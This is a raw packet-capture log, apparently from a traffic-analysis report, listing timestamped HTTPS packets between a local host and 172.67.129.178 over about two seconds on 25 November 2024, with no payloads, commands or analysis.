                                                                                Nov 25, 2024 14:47:24.971077919 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.971088886 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.971141100 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.975501060 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.975512981 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.975603104 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.979790926 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.979851007 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.984343052 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.984355927 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.984416962 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.993426085 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.993501902 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.997634888 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.002172947 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.002240896 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.002255917 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.002315044 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.011003017 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.011077881 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.015513897 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.015587091 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.019972086 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.020055056 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.028804064 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.028882027 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.037766933 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.037830114 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.042357922 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.042422056 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.051703930 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.051783085 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.059942007 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.060022116 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.149529934 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.149614096 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.153145075 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.153218031 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.160041094 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.160144091 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.166872025 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.166934967 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.173451900 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.173512936 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.176186085 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.176260948 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.182358980 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.182435036 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.185321093 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.185384989 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.191220999 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.191287994 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.194214106 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.194277048 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.200217962 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.200288057 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.206187010 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.206257105 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.212271929 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.212363958 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.212384939 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.217956066 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.218049049 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.218067884 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.218121052 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.220973015 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.221072912 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.227044106 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.227145910 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.232938051 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.233042955 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.236004114 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.236076117 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.241815090 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.241879940 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.247756004 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.247829914 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.267524958 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.267601967 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.271894932 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.271985054 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.287267923 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.287278891 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.287322998 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.287364960 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.287385941 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.287399054 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.328697920 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.358927965 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.358938932 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.358977079 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.359034061 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.359056950 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.359098911 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.359119892 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.372735023 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.372750998 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.372874022 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.372884989 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.372936010 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.386214972 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.386231899 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.386339903 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.386352062 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.386396885 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.395709038 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.395725965 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.395967960 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.395979881 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.396030903 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.405061960 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.405078888 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.405152082 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.405162096 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.405206919 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.412051916 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.412069082 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.412159920 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.412172079 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.412216902 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.420166969 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.420181990 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.420257092 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.420264959 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.420310020 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.549767017 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.549784899 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.549873114 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.549894094 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.549942017 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.555588961 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.555604935 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.555669069 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.555679083 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.555707932 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.555723906 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.561942101 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.561956882 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.562021017 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.562028885 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.562073946 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.567718983 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.567734003 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.567806005 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.567814112 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.567864895 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.574006081 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.574021101 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.574085951 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.574094057 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.574136972 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.579946995 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.579962015 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.580035925 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.580044985 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.580085993 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.586364031 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.586379051 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.586483002 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.586492062 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.586548090 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.592735052 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.592750072 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.592822075 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.592839003 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.592886925 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.751415014 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.751446962 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.751537085 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.751570940 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.751614094 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.757200003 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.757225990 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.757325888 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.757344007 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.757409096 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.763695002 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.763716936 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.763808012 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.763825893 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.763870955 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.769073009 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.769087076 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.769277096 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.769306898 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.769356966 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.775510073 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.775531054 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.775598049 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.775608063 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.775645018 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.775664091 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.781508923 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.781524897 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.781629086 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.781636000 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.781696081 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.787816048 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.787831068 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.787897110 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.787903070 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.787919044 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.787949085 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.794176102 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.794189930 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.794256926 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.794264078 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.794301033 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.953450918 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.953474998 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.953563929 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.953588963 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.953646898 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.958997011 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.959013939 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.959095955 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.959104061 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.959146976 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.965356112 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.965373993 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.965552092 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.965562105 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.965607882 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.970885992 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.970902920 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.970983982 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.970995903 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.971044064 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.977344990 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.977363110 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.977446079 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.977456093 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.977520943 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.983364105 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.983380079 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.983458996 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.983467102 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.983513117 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.989784956 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.989801884 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.989912987 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.989921093 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.989972115 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.996140003 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.996156931 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.996253014 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:25.996260881 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:25.996309996 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.153924942 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.153947115 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.154036999 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.154074907 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.154150009 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.159769058 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.159787893 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.159857988 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.159867048 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.159913063 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.166244030 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.166258097 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.166341066 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.166347027 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.166384935 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.172574997 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.172589064 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.172655106 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.172669888 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.172704935 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.178150892 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.178165913 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.178240061 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.178246975 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.178287983 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.184242010 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.184257984 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.184319973 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.184326887 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.184371948 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.190643072 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.190658092 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.190747976 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.190756083 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.190804958 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.196866035 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.196882010 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.196962118 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.196968079 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.197009087 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.356112003 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.356147051 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.356216908 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.356256962 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.356276035 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.356298923 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.361816883 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.361835003 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.361897945 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.361910105 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.362080097 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.368140936 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.368155956 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.368257999 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.368274927 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.368323088 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.374598980 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.374620914 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.374684095 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.374691010 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.374730110 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.380377054 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.380390882 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.380567074 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.380573988 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.380619049 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.386972904 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.386989117 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.387058973 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.387064934 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.387115002 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.392700911 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.392716885 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.392797947 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.392805099 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.392848969 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.398906946 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.398922920 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.398993015 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.398998976 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.399043083 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.558312893 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.558346033 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:26.558434963 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:26.558474064 CET44349737172.67.129.178192.168.2.4
